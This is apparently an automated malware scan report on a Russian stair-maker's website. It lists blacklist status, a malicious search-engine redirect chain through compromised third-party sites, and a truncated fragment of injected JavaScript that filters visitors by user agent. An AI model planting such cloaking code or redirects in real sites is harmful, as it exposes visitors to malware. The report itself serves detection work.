Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pskovlestnica.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pskovlestnica.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://pskovlestnica.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: pskovlestnica.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 11 Oct 2014 07:04:07 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 11 Oct 2014 06:40:34 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.33 | malicious |
Scanned pages/files
Request | Server response | Status |
http://pskovlestnica.ru/ | 200 OK Content-Length: 19745 Content-Type: text/html | clean |
http://pskovlestnica.ru/media/system/js/caption.js | 200 OK Content-Length: 167 Content-Type: application/x-javascript | clean |
http://www.pskovlestnica.ru/modules/mod_djimageslider/assets/slider.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://pskovlestnica.ru/plugins/content/highslide/highslide-full.packed.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://pskovlestnica.ru/plugins/content/highslide/easing_equations.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://pskovlestnica.ru/plugins/content/highslide/swfobject.js | 200 OK Content-Length: 27 Content-Type: application/x-javascript | clean |
http://pskovlestnica.ru/plugins/content/highslide/language/ru.js | 200 OK Content-Length: 1637 Content-Type: application/x-javascript | clean |
http://pskovlestnica.ru/plugins/content/highslide/config/js/highslide-sitesettings.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.pskovlestnica.ru/templates/lestnov_2.0/js/scripts.js?1402203651 | 200 OK Content-Length: 884 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/18.0|Firefox/18.0.1|Firefox/17.0|Firefox/12.0|Firefox/25.0|Firefox/24.0|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/25.0.1|Firefox/26.0|Firefox/27.0|Maxthon|MRSPUTNIK|Mini|Firefox/28.0|BlackBerry|PLAYSTATION|Wget|Firefox/27.0.1'; nevernList = nevernList.split('|'); var neverbUA = false; for (var i in nevernList) { if (stripos(navigator.userAgent Antivirus reports:
| ||
http://www.pskovlestnica.ru/plugins/content/joomthumbnail/gallery/jsibox/jsibox_basic.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://pskovlestnica.ru/index.php | 200 OK Content-Length: 19754 Content-Type: text/html | clean |
http://pskovlestnica.ru/catalogue.html | 200 OK Content-Length: 150777 Content-Type: text/html | clean |
http://pskovlestnica.ru/media/system/js/modal.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.pskovlestnica.ru/components/com_djcatalog2/theme/js/djcatalog2.js | 200 OK Content-Length: 2086 Content-Type: application/x-javascript | clean |
http://www.pskovlestnica.ru/components/com_djcatalog2/theme/js/slimbox-1.58/js/slimbox.js | 200 OK Content-Length: 4691 Content-Type: application/x-javascript | clean |